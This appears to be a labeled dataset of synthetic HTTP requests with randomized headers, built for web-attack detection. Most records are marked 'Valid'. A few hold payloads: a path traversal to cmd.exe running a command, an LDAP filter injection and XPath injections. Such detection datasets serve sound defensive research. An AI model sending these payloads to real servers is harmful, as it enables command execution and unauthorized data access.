Cookie2: $Version="994"
Date: Sat, 19 Jun 04 05:46:13 CET
ETag: W/"NBz9wNb-4B9rg@Ptau"
Expect: 100-continue
From: aIsia@oetle.org
If-Modified-Since: Tue, 30 Aug 05 20:15:31 UTC
If-Unmodified-Since: Wed, 18 Mar 09 02:42:59 CET
If-Match: *
If-None-Match: "2g08--ljjUdBm9Y"
If-Range: *
Max-Forwards: 7476
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM Z2huZTZwcmlldG84d2Vpc2VhZDNpZ25lZmhmZWVlbHRlZGxhOGFn
Authorization: ehbrxw s7ri=7cddeAtn
Range: 123920-
Referer: http://reoaT2.fr/ltrlw/hlpp36co/ooan3f/nhfhoHa.cfm
TE: deflate
Trailer: If-Match
User-Agent: gatf/5.6.7.5.5
UA-CPU: Sparc
UA-Disp: 945,8372,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 072x109
Via: pad/3.3 61.87.216.217, 9.6 www.eEozirue.png:34018, FTP/7.7 www.sidso.png
Transfer-Encoding: gzip
Upgrade: sto2/5.6, i35ueo/6.1, obrejt/0.3, it5/7.0, igelon/5.7
Warning: 682 35.185.78.68 "bo8E" "Thu, 30 Oct 08 07:35:44 UTC"
X-Forwarded-For: 16.208.183.253
X-Serial-Number: 91220427481224
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12694
Start - Id: 34602
class: Valid
POST /xidtsaa/eyyFG.IdPTHMJetJU/tTRiA-fEYAplUN0@/homeFiframe0scriptV.php3? HTTP/1.1
Content-Length: 190
Content-Language: qea
Content-Encoding: gzip
Content-Location: /rofhEcb/6sqL/tsykeeim/rhs3htda/r36aeoe.cgi
Content-MD5: ZW9hN3NzYW9tOG5pdDF1ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Feb 04 03:09:08 CET
Last-Modified: Fri, 30 Apr 10 06:23:31 CET
Host: www.meatbtiuod.be:80
Connection: hipmhohg
Accept: */*;q=0.2
Accept-Charset: windows-1251;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 60.53.181.132
Cookie: jNLLplIta=48657;or2rlirtei=nve
Cookie2: $Version="658"
Date: Tue, 10 Feb 09 23:09:59 CET
ETag: W/"vPwpXccS6LBbiMltIVZB"
Expect: esccraO6=rlwoOyee;kiigloo=603t
From: 9rrsW@dinSeD2.ch
If-Modified-Since: Mon, 15 Jan 07 16:17:46 UTC
If-Unmodified-Since: Mon, 17 Mar 08 05:44:44 UTC
If-Match: *
If-None-Match: "Ix6a0Xdrfl82Q-C@O"
If-Range: *
Max-Forwards: 2
MIME-Version: 4.8
Pragma: uoniws=ED
Proxy-Authorization: amH2c rnecro=ka4eNao
Authorization: NTLM Z25yYWhvMHJoRWZlVG9vZWFzZ0k4b2lBc2h0Ykxubmlu
Range: -64
Referer: /elets/2onuo4.jsp
TE: chunked;q=0.8,chunked;q=0.2,chunked
Trailer: Accept
User-Agent: eeinevHt/6.6
UA-CPU: PowerPC
UA-Disp: 769,2419,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6005x647
Via: HTTP/5.2 156.106.63.58, hlar/2.2 198.91.2.51, 1.9 www.sefe.css
Transfer-Encoding: identity
Upgrade: fco/1.0, aeshit/3.2, 5nnce/2.9
Warning: 945 www.eeodke.htm "hasrmstcsdtwtkpyg" "Tue, 18 Dec 07 06:07:29 UTC"
X-Forwarded-For: 24.202.233.40
X-Serial-Number: 1977553705
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

IHARe3uH7@jU=onehetybfct&tntiiyd=257&cEskaeebsai=eFQ5&QMQ2I6=o&mmi=4o5Stoeaetsa&Ey3kor3t6ph=secxnfeah\op$eh&yrkfsswKepthaHr=Pcmdbi&I2raBDPavpni78v=+tut irua)ie6 e&4a2lmslsho=9rn\I 

End - Id: 34602
Start - Id: 43858
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 51.248.45.103
Connection: close
Accept: */*;q=0.6
Accept-Charset: cp-932;q=0.4, iso-8859-2;q=0.7
Accept-Encoding: *
Accept-Language: ex-elhecs, 3t-hod3, e8cl-gsme
Cache-Control: no-cache
Client-ip: 9.232.251.46
Cookie: CvD_=se;Medtaz=793;sNert=ix.I1JDzj3k;3reiehktcibzeiM=ena
Cookie2: $Version="07"
Date: Thu, 01 Dec 05 04:01:47 UTC
ETag: W/"77rk5N1JK52-rQYG"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 19 Apr 04 12:20:52 GMT
If-Unmodified-Since: Thu, 31 May 07 08:10:28 GMT
If-Match: "iT.aZsHebK.VkG68xcBy"
If-None-Match: "iKysEnX1om9AoSfLW9"
If-Range: *
Max-Forwards: 005
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: gn7du2 ngrnDe=ecst
Range: 064373-124259,214-265,801-679
Referer: /tyhwseaa/gieea0cs.zip
TE: trailers
Trailer: User-Agent
User-Agent: aoRmdil/5.0.4.3
UA-CPU: PowerPC
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/3.8 242.139.29.49:46381, HTTP/1.2 www.pdad.shtml, 9.8 www.ltntihk.jpg
Transfer-Encoding: tdfaN
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 623 www.ednk.css "ctoro1sddstfeDiliter" 
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43858
Start - Id: 30967
class: Valid
GET /SgeWy3P_iRj/hHq7tzbHmOVcvoICfm/Qb9@BJ/rh2nHsrDnetPsmcmn5Re/3kNx/p4Vaej6On/ort16JjXDJNyw-7HPoz/fie8ZmMUqj/eoJc_VirjVVI5/epG0zIY1May/l1l_OqrX/eaMacpVPU0.cfm? HTTP/1.1
Host: 159.18.222.60
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.9, gzip;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 247.73.147.159
Cookie: i6elwa=snn9rqzp;15cgdrao5= mo;J8UWphpmcmdJ=nv;wqts2ahrbE=undQL;ccsx=tlibua;efn=t7sdst
Cookie2: $Version="339"
Date: Sat, 25 Mar 06 14:58:26 GMT
ETag: "5e_Nr_S.RrEhzGj7@IRz"
Expect: 2eSsm=bahsd;la4Rzej
From: rW6e@mEoyrtntoo.uk
If-Modified-Since: Fri, 30 Jan 09 06:14:15 UTC
If-Unmodified-Since: Mon, 06 Feb 06 22:47:36 GMT
If-Match: "wdHe3UMnh7mOoSZ"
If-None-Match: "Zp6qDn2jvs.kREfJ"
If-Range: Tue, 28 Aug 07 17:47:19 CET
Max-Forwards: 652
MIME-Version: 2.1
Pragma: hlmi=aeOhorne
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic NmM5dTo4c3NzZA==
Range: -73
Referer: http://izqns.gov/nvhl/uinrv1/kstH3p/le4tDSd.php3
TE: trailers,chunked
Trailer: Via
User-Agent: rdOhh/5.3
UA-CPU: PowerPC
UA-Disp: 6522,303,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 206x306
Via: 6.3 72.175.164.104:6, 9.4 www.manrjJ.shtml
Transfer-Encoding: deflate
Upgrade: ehia/0.0, eN7b/7.6
Warning: 912 www.svdVuoCG.jpg "fhodof" "Sat, 09 May 09 20:18:55 CET"
X-Forwarded-For: 19.38.156.93
X-Serial-Number: 65625
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30967
Start - Id: 21815
class: Valid
GET /t4MN7seWOU3havingwhereAmail/fYva4z6_q60AHa.php3?AIl-Y@px=fbitEsfenanojnth&ogarm=dBHaW_iza2J&.UmCA94bEs=57&4fl=42420425&Fa=oeinsue&Nerjschijt=2%28cmdyl&solsfditt8=+dkisgroup+byTi&VQhBx3@WH=m3ednt+ellG&7YLxVKjhXmN5=69964&aio=0214&i4awooostegLeJ=goem&rguye=ospn HTTP/1.0
Host: 212.218.230.33
Connection: agwsRo
Accept: video/quicktime
Accept-Charset: windows-1254;q=0.8, windows-1255;q=0.1
Accept-Encoding: *
Accept-Language: a-iio, nAi5rpio-ib1cT;q=0.3, auefJjen-oco
Cache-Control: max-age=5
Client-ip: 196.172.163.174
Cookie: dl=aIm_fG8ta
Cookie2: $Version="412"
Date: Sun, 14 Feb 10 04:24:31 CET
ETag: W/"h2ZOQ8GkeMdfl7Omwh"
Expect: e9ns
From: erebpii@esooalaoiw.de
If-Modified-Since: Thu, 02 Aug 07 20:39:11 UTC
If-Unmodified-Since: Mon, 19 Jul 04 05:36:58 GMT
If-Match: *
If-None-Match: "qfYyj.PQ1jJFO1mvxD0W"
If-Range: "gk4wh8fcxwRRJU6RCO3a"
Max-Forwards: 7
MIME-Version: 1.2
Pragma: oflceuLr=af1c
Proxy-Authorization: NTLM cXJlYXNDbkE2enhlbW40aHI0emdld2hlb296aWU3bm4=
Authorization: seuesq RrdXiyhh=ooi6v
Range: 728147-66,8714-380,41-
Referer: /az5jnt/y2sqic/eyrp/tvesht.jpeg
TE: deflate,trailers,trailers
Trailer: Accept-Charset
User-Agent: cuno2nmqm8afeoef
UA-CPU: StrongARM
UA-Disp: 488,0035,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 777x599
Via: 0.8 11.126.27.101
Transfer-Encoding: 3e3o
Upgrade: eAsu/5.0, gdb/6.1
Warning: 052 www.rdtt1ah.js "6g169" 
X-Forwarded-For: 32.5.142.115
X-Serial-Number: 8436166703567420278
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21815
Start - Id: 37516
class: LdapInjection
POST /r-m6lzNuMsaxV3pm.bin? HTTP/1.1
Content-Length: 67
Content-Language: 5eu
Content-Encoding: identity
Content-Location: http://4rMNi5.cz/eutsm/3ir7tT/rrdnld8t.jsp
Content-MD5: dG9kdGlNdHJhNXRCZW52ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Jul 04 08:47:31 CET
Last-Modified: Fri, 20 Apr 07 20:09:18 CET
Host: 43.173.89.174:9530
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-greek, cp-936;q=0.6, euc-tw
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 244.64.43.249
Cookie: FosvBlorn=itprocessing-instruction+loHnisla;ense5hIorcrcriF=eekDeihmlnie
Cookie2: $Version="571"
Date: Tue, 09 Aug 05 10:55:36 CET
ETag: "u34qWBiJNpxKq9A"
Expect: 100-continue
From: 3t4hae@dlnp4fwft.uk
If-Modified-Since: Wed, 27 Apr 05 12:30:48 CET
If-Unmodified-Since: Tue, 12 May 09 02:54:26 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 587
MIME-Version: 0.6
Pragma: rU='6tge'
Proxy-Authorization: Digest username="htyrO"
Authorization: NTLM dGFzbHRyb3l3Vm92dGNtcnBhYXRpamhyV0tyYW94c3lvOGFzVWxyYW9l
Range: 0516-7855,069180-,334-
Referer: http://www.zlnIa3.cz/1yebbs/otea/qiaohe/rgyoi.php3
TE: deflate,gzip,trailers
Trailer: Connection
User-Agent: Mozilla/0.6 (compatible; Konqueror/7.0; Win 9x; xSqqi; enhDjp)
UA-CPU: 68000
UA-Pixels: 2665x9772
Via: HTTP/9.6 221.168.145.233
Transfer-Encoding: gzip
Upgrade: c0e/0.5, ndgd/9.1
Warning: 123 www.sswne9.png "xiaoxtnnd9tipju" 
X-Serial-Number: 4606842395290054569

triaperam=iimRti2wt&yidt=eol)(&(objectClass    =   et*)

End - Id: 37516
Start - Id: 27254
class: Valid
GET /uP8ncL5wUiTbN.WE_.TL.tiff? HTTP/1.0
Host: www.sdoshrds.uk:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 28.64.233.246
Cookie: ncbKLuiMservices=aGD;Izxarnnoa6n6uet=Euj;ay6n=g$9B;bog=Sh$gtu<>u0ewhere;eessamCr(
Cookie2: $Version="53"
Date: Wed, 21 Jun 06 08:17:20 CET
ETag: W/"EcV26DXpctmVwwvi5"
Expect: pwheml=emo4nORl
From: rted@eseO4iri7.net
If-Modified-Since: Thu, 22 Oct 09 11:07:57 UTC
If-Unmodified-Since: Thu, 20 May 04 12:18:04 GMT
If-Match: "Ckm4fAV3J-fGxn3H0Lz"
If-None-Match: *
If-Range: *
Max-Forwards: 602
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="phSqht"
Authorization: eshX4 ea9ltarc=tl7eX
Range: -7
Referer: /on62h/xAoidhce/Aergd8w.mdb
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: Gkn4e (nitP-.NaFL)
UA-CPU: Sparc
UA-Disp: 4043,642,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8847x8709
Via: FTP/4.0 www.u4jteto.htm, 9.7 95.53.8.67
Transfer-Encoding: deflate
Upgrade: afs/5.2
Warning: 401 www.sbfs.jpeg "cs4fiar" "Thu, 05 Jul 07 13:41:31 GMT"
X-Forwarded-For: 59.58.186.111
X-Serial-Number: 03585265611938930040
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 27254
Start - Id: 48548
class: XPathInjection
PUT /ombiaoh/aMe2o1nthesoe0Ptghtj/X5X/njXzCId-Ev4vPNV/ushE15l/S9/uglReEoeE1t/u2h8dYBxGW/mtJ8Fr1AYLy6MYY8Aa/itKG.bin? HTTP/1.1
Content-Length: 338
Content-Language: IOp
Content-Encoding: compress
Content-Location: /b8OTd/mlh0ieG/e3aS/DauWe.html
Content-MD5: YW9uZGRlaDhlZXllcm5oZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Sep 04 10:52:23 UTC
Last-Modified: Wed, 14 Jun 06 07:40:57 CET
Host: 174.158.253.37
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *;q=0.2
Cache-Control: min-fresh=45171
Client-ip: 220.175.249.82
Cookie: eugRibeeG=5;iaeortiaxgen=emcikemetakuazbore
Cookie2: $Version="4"
Date: Mon, 21 Sep 09 03:45:59 GMT
ETag: W/"9a.@kRmZK0277p2HO0wo"
Expect: wnoeeHd
From: 5lotN@aerqwne.st
If-Modified-Since: Fri, 05 Dec 08 10:19:32 GMT
If-Unmodified-Since: Fri, 27 Feb 04 02:00:01 CET
If-Match: "GvhUGbSDmQ1Xtoz"
If-None-Match: "_OI8HS55.v3-p4_NewN8"
If-Range: *
Max-Forwards: 7
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM dDR0b2RiT2NyTWVsaW1zYnRuZG5qY2U4MnM3cWN0ZGo=
Range: 4-,9-
Referer: /yrynfi/r0rt/ssmou/8etan.aspx
TE: chunked;q=0.8,trailers
Trailer: If-Modified-Since
User-Agent: nnTeNcsnh5
UA-CPU: StrongARM
UA-Disp: 8923,087,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 429x1759
Via: FTP/9.7 143.89.197.3, HTTP/3.0 www.oricnAfx.jpeg
Transfer-Encoding: compress
Upgrade: lexe/0.2, mX4rfi/5.5, ue5de/1.9
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 63432598525498098
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mnuf=h9or-G&XEyhsyeee5p=uYPEmd3&socrtsyle=orlr&vh4nrogsad=53633&gryle0uhrrhRlon=H)/gohw%uiiD8te&otrkmaoe2=6&a30sfYYoioEie=sf4&t4ts=358&eebeoStuort67ms=rett&nqadrn0=roBeoye']    | P |  //user[   name/text( ) =  'wS&adnmypacp=evs 8&IKCh.serviceshttpSinput@q2=ueu0sbe61Ssnnp2EtS&p9g9d=s4nttheRb&9emr1r37otca=a3p

End - Id: 48548
Start - Id: 35521
class: XPathInjection
PUT /tFNGKTkR/awE.veR0Zmr4liuaS/b8KH0amlog/Ew/catNuy3rALQtelnetv/m7pqFh/PHbTWFO0insertYSq/leacqtd/ri79diatm/yaEiiro1riwQ/eeOsrdweszPgrird/NcdJULKcopyoXs9lib.jpg? HTTP/1.0
Content-Length: 169
Content-Language: 1itere,mnTR,sppmns7
Content-Encoding: identity
Content-Location: http://www.htbemq.st/aWia2/yiwttrlS/lgaza.zip
Content-MD5: aWlyZXR1cml5UklhZW5udg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Jun 04 20:40:13 GMT
Last-Modified: Tue, 20 Apr 04 01:58:03 CET
Host: 155.229.66.255
Connection: aicte
Accept: application/*;q=0.4
Accept-Charset: euc-tw
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=40
Client-ip: 131.127.60.242
Cookie: LUboot.iniaOEVy=24472;168sqtrrtolps=erR
Cookie2: $Version="1"
Date: Tue, 26 Jan 10 07:47:37 UTC
ETag: "pjVM2@qz7S7-tpwC"
Expect: 100-continue
From: iSTRreh@vcr3m.net
If-Modified-Since: Tue, 02 Dec 08 07:58:08 CET
If-Unmodified-Since: Sat, 12 May 07 16:49:45 CET
If-Match: "65vsifuT2uKvnZ-iUT"
If-None-Match: "piErswzBRTVTZp7NuS"
If-Range: Sat, 04 Feb 06 22:38:31 GMT
Max-Forwards: 444
MIME-Version: 2.0
Pragma: no-cache
Authorization: NTLM b2l0Y2FvQ2l0MnJzdm5lb2VpZWhFZW90dHF0NmFxaWV0eWVOZWQ=
Referer: http://www.m0ofd4.org/Ieucpta9/kowhtsu/dee8eo0.pl
Trailer: Pragma
User-Agent: Mozilla/0.3 (X11; U; Open BSD i586 7.0; xp-In; rv:4.0.6) Gecko/20244652
UA-Disp: 740,794,8
Via: HTTP/2.0 40.243.44.154, 6.4 www.tnxyl.shtml
Transfer-Encoding: identity
Upgrade: hs1gw/0.3, rdt/3.0

tanoj=uus9'   or    1< t2wi/lSdsxe/eCos6/child::text()[position()=57] or 'omn'    =    '&jwvm=61&caea2fXTa3n=1191&areEE=566020&aeos= 

End - Id: 35521
Start - Id: 8318
class: Valid
GET /iQMFfUE/rsO097dt/eyLQTsFtMr1lDYUagS.htm?tsIiseituoa=2614&aangfyai=n1is-HrXQgN-&heeeCNeao=55&hftiahsde=s5rtr&nrrddva=59&ANs=%28msacatjboot.inic&BYexecmUtacceptxtermOe=entth HTTP/1.0
Host: 22.133.245.63
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: heC-keiepso, mhjnmo-shrt, 1dot-znrR;q=0.7
Cache-Control: no-cache
Client-ip: 143.52.91.240
Cookie: 7bincludesSACLNX=t
Cookie2: $Version="8"
Date: Sun, 18 Feb 07 07:06:57 GMT
ETag: W/"lQINYY0cK-nGz8mysE"
Expect: 0axE=agh6iirq
From: vAneoO@xoHsahh.it
If-Modified-Since: Fri, 19 Dec 08 12:56:16 GMT
If-Unmodified-Since: Tue, 14 Sep 04 17:20:10 UTC
If-Match: "hJkUGP.L_Smm98oUoIrF"
If-None-Match: "M4xvi8QZfp1i3Ucmq8"
If-Range: Tue, 20 Jun 06 12:04:45 CET
Max-Forwards: 9640
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Basic bHF0bnJzbWk6bHhsbWk=
Authorization: NTLM YmNhdXJ0ZWh1bjRlUjl3NWFlbW04b2Vycml0NnlkRGluNDNyaW50Z2Np
Range: -1511,1647-46745
Referer: http://mreeIeri.it/Remts/odrwsi/qcnn/oxerz.jpg
TE: deflate
Trailer: If-Range
User-Agent: Mozilla/0.2 (X11; U; Unix 8.8; al-Se; rv:0.7.1) Gecko/22865260
UA-CPU: StrongARM
UA-Disp: 8260,7505,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 071x825
Via: 5.5 162.157.214.105, HTTP/5.5 www.eitsh.png, 1.7 142.60.210.193
Transfer-Encoding: identity
Upgrade: rREn/2.9, di70e5/6.8, Oae/2.0, tCr/0.8, vn7low/5.7
Warning: 477 203.254.244.133:8 "Cspr5Osssgcfn" 
X-Forwarded-For: 35.25.216.107
X-Serial-Number: 9179541
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8318
Start - Id: 29861
class: Valid
GET /lICequwMu1SxTwd4Ohc.jsp?chs8ahssrReLrid=%27Vhyye&tI4RiNniln=973252679&dseb=estyle&Etaeoiel0tTt=enbodyhform-te0ai%5DIbechildlWnE&geNfe=aM18ZEGS&6W0ZzT8dQFchild=uepassthrur&iltcv=group+bytsposition&R3TJ1k=9356521&Sh0.qyr=zm%25&8X_0Dwscriptdelete7andr4=43219&nr=025183&d0=5_4C-tSFF HTTP/1.0
Host: 197.167.84.163
Connection: close
Accept: */*;q=0.1
Accept-Charset: windows-1254;q=0.3, iso-8859-1, x-mac-korean;q=0.7
Accept-Encoding: identity, compress;q=0.7, identity, compress
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 79.194.70.87
Cookie: tNApt2=hatlnegchenfgta;Ym61B=uglf in>;?hN|3autoexec3Eih;fhthenawigelhk=connectNgn;qResc=3::ghtacces9ttpee4t@ie;cn=1
Cookie2: $Version="927"
Date: Mon, 12 Apr 04 14:58:27 UTC
ETag: W/"ZnCjVM6hgU@K8Mhip"
Expect: etPm=nrnm;ogeaanT
From: hggtsom6@ieylr.uk
If-Modified-Since: Sat, 30 Oct 04 11:14:47 UTC
If-Unmodified-Since: Fri, 15 Aug 08 21:19:04 GMT
If-Match: *
If-None-Match: "7ELha6dL.pscDw@"
If-Range: Fri, 31 Dec 04 05:16:21 UTC
Max-Forwards: 69
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest response="45DcFe932F9403C0A2bd6e0bCfDd5a07"
Authorization: gysyz 0cnx=o5Qpe
Range: -0,-313,82-35861
Referer: http://e7lrog.de/rsnnlo/euaFi/koitybh9.cfm
TE: trailers,deflate;q=0.0,gzip;q=0.5
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.2 (X11; U; Open BSD i386 4.6; uI-ee; rv:2.5.4) Gecko/74978844
UA-CPU: MIPS
UA-Disp: 724,467,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 952x914
Via: 8.2 124.134.162.172, 3.6 188.212.89.177:62, 6.4 109.248.32.61
Transfer-Encoding: deflate
Upgrade: eiseh/5.9
Warning: 570 101.76.63.64 "qhHehxa5pope" 
X-Forwarded-For: 255.72.182.148
X-Serial-Number: 82258082988548
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29861
Start - Id: 3684
class: Valid
GET /f6uIp9mE./Ug35rhBonshnMftm2e/xsatemitsraZyauvsis/5q6N/0ae.pl?56MkR51E=hi4dtn%3Cmaoaa%7Cqservices%28oll HTTP/1.1
Host: www.oyoshmeNtm.fr
Connection: tV3ssBA
Accept: */*
Accept-Charset: shift_jis;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: iesohbfk-nv2awiue, ntd-e7i;q=0.7
Cache-Control: cwflmt='holbowxr'
Client-ip: 96.20.101.191
Cookie: mO=7m7LIc@aQcZ;et=e.dbE.-k2yC;geotgomssma=btbciatEedng;i0A=i6
Cookie2: $Version="66"
Date: Wed, 02 Feb 05 10:18:56 CET
ETag: W/"tYocNHVY96Z_wzgnl"
From: msqr@3sAneh.gov
If-Modified-Since: Sat, 24 Jul 04 17:16:04 GMT
If-Unmodified-Since: Sat, 06 Feb 10 02:25:51 UTC
If-Match: *
If-None-Match: "klrSX8PR@6GBHrR"
If-Range: "7TONY14QovMbfS6gIv_i"
Max-Forwards: 07
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: 2nsn hBbdTAE=enci
Authorization: Digest qop=auth-int
Referer: /hnooiD98/ssxare/ltssi.pdf
TE: gzip;q=0.3
Trailer: Accept-Language
User-Agent: uerZw/7.7
UA-Disp: 7385,2023,32
UA-OS: Mac OS X
Via: 5.4 214.241.104.98, 8.9 www.lde9zRn.tiff
Transfer-Encoding: gzip
Upgrade: oem/9.0
Warning: 881 204.8.105.138 "5ptueh5" 
X-Forwarded-For: 244.94.150.34
----: -----------------

null

End - Id: 3684
Start - Id: 15937
class: Valid
GET /ssRtIsVtBx.9XKA-lc/eg8t/N9b2fvc5i.zV4T/afgvtxFuicj-xufo8G4/tm5P@A182xoNV/eoaS/si6rxlqoah0sCbs/Jylocation_ukypY_8/urEtwTo/9sv1hheotdi/inonrtlceaffti7xee8i/rkr.html?tndfLii5oyirr=S&5rcp8rLmail5llz=0847627&Ks7oi22dst=62&5W54=34 HTTP/1.0
Host: 20.64.175.154:80
Connection: close
Accept: image/png, audio/*, video/quicktime
Accept-Charset: cp-932, iso-8859-15, us-ascii;q=0.3, windows-1258;q=0.6, x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 80.167.167.42
Cookie: 6hh=snoMPl;ssBR2g=5;41=dei;liswbwdkua4amh=ewhere4wnmochaiiErO;rebd9ltSn=wAe
Cookie2: $Version="589"
Date: Sun, 12 Dec 04 05:44:00 GMT
ETag: "09Z@qXdgqn32Nh1uT"
Expect: oTese=dimta
From: dejt@eiwqestde.org
If-Modified-Since: Tue, 04 Jul 06 19:59:48 GMT
If-Unmodified-Since: Fri, 01 May 09 12:48:46 GMT
If-Match: *
If-None-Match: "NOGqUpheS5PWTTG24M"
If-Range: Thu, 30 Sep 04 10:57:31 UTC
Max-Forwards: 3155
MIME-Version: 6.6
Pragma: StwSTs='emEfnshF'
Proxy-Authorization: Basic OU5Ucmk1OnNzRWxh
Authorization: Digest opaque="Ns8fivs"
Range: -08,0744-,-43437
Referer: http://www.i5kiov.biz/stcP.cfm
TE: chunked;q=0.0,chunked;q=0.6
Trailer: Trailer
User-Agent: uRwcxK6l4F http://www.neto.org
UA-CPU: Sparc
UA-Disp: 9960,6267,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7490x6757
Via: 5.6 149.62.180.210
Transfer-Encoding: compress
Upgrade: nbf6oi/8.6, oqeh/3.0
Warning: 043 43.221.213.2 "aosrvsdSerhlegrta" 
X-Forwarded-For: 34.10.5.61
X-Serial-Number: 902795825
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15937
Start - Id: 8670
class: Valid
GET /tnnbelnietr4esl/neyuYbnmiKz/MFtOAhF7R1MW/oCe3h3ntat6ha/rUu629dag/ychupKAA/2j/cLPJO/OnrLoAYum/ZqhQZaUd2/vytarfoctstkjs4wcU.js?ge2E7teoe5s=eteesers3%40&eun4saee9d=tehtaccesoolnnC&rowaejeiarin=2310&autmewme0=52478715&iuEmelobobcgs=apoys&9PiWIIX5It=nhkdat&alio6rse5erhi=89305&6nLbttaotb3tsn=19256841 HTTP/1.1
Host: www.jotrT.fr:80
Connection: Irhe
Accept: text/xml
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: Atbii6s-e4lan;q=0.7, t9ef-eecoi;q=0.2, i1mo-etc, qsan-m2e;q=0.2
Cache-Control: no-store
Client-ip: 164.241.30.188
Cookie: wielt1=mcgm;itdaYGppsefgr=wheretac
Cookie2: $Version="778"
Date: Wed, 16 Apr 08 18:19:10 GMT
ETag: W/"CB52bo-Fvek4b2tI2L9A"
Expect: 100-continue
From: Xsnt@ceTo3y.it
If-Modified-Since: Mon, 12 Apr 10 05:55:47 GMT
If-Unmodified-Since: Fri, 24 Oct 08 17:46:36 UTC
If-Match: *
If-None-Match: "lxy43cnjgnvjNzv"
If-Range: "Lpxvh1lIWHAzR6ZDQ"
Max-Forwards: 219
MIME-Version: 1.4
Pragma: nva='1'
Proxy-Authorization: ns7siw llzif0=ebeiais
Authorization: enntrt boer7eg=dpmtt
Range: -766,58-986789
Referer: http://www.eornq.net/nRoc/hrxwufE.pl
TE: trailers,gzip,chunked;q=0.6
Trailer: Referer
User-Agent: Mozilla/3.9 (compatible; MSIE 9.4; Linux i386; iktiEjH1qb; n0sl; vlrd)
UA-CPU: MIPS
UA-Disp: 502,6402,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8393x485
Via: 0.8 www.itiild.js, 7.9 68.7.184.28
Transfer-Encoding: compress
Upgrade: eswo/1.2, 2shets/0.9, Ic4/7.0
Warning: 888 www.beiaIt.css "S3j3Xr4oawsaaadt" "Mon, 27 Aug 07 01:27:20 GMT"
X-Forwarded-For: 199.125.170.108
X-Serial-Number: 396730650206
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8670
Start - Id: 19203
class: Valid
GET /Kheheyodse/eCz/1acssheejoiao4/ndGP1RVb/vZUHZ.Ft_4Eml7BcV7/rbg/e@ArMydeVlef-ah/pKMp89bCYw@aGL8/Zvgtjlneiaweesmlm1n/nrfibrdcdSnstmhohsg/aV.js? HTTP/1.1
Host: www.bJdoIEc.org
Connection: close
Accept: text/*;q=0.6, audio/x-wav, text/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.2
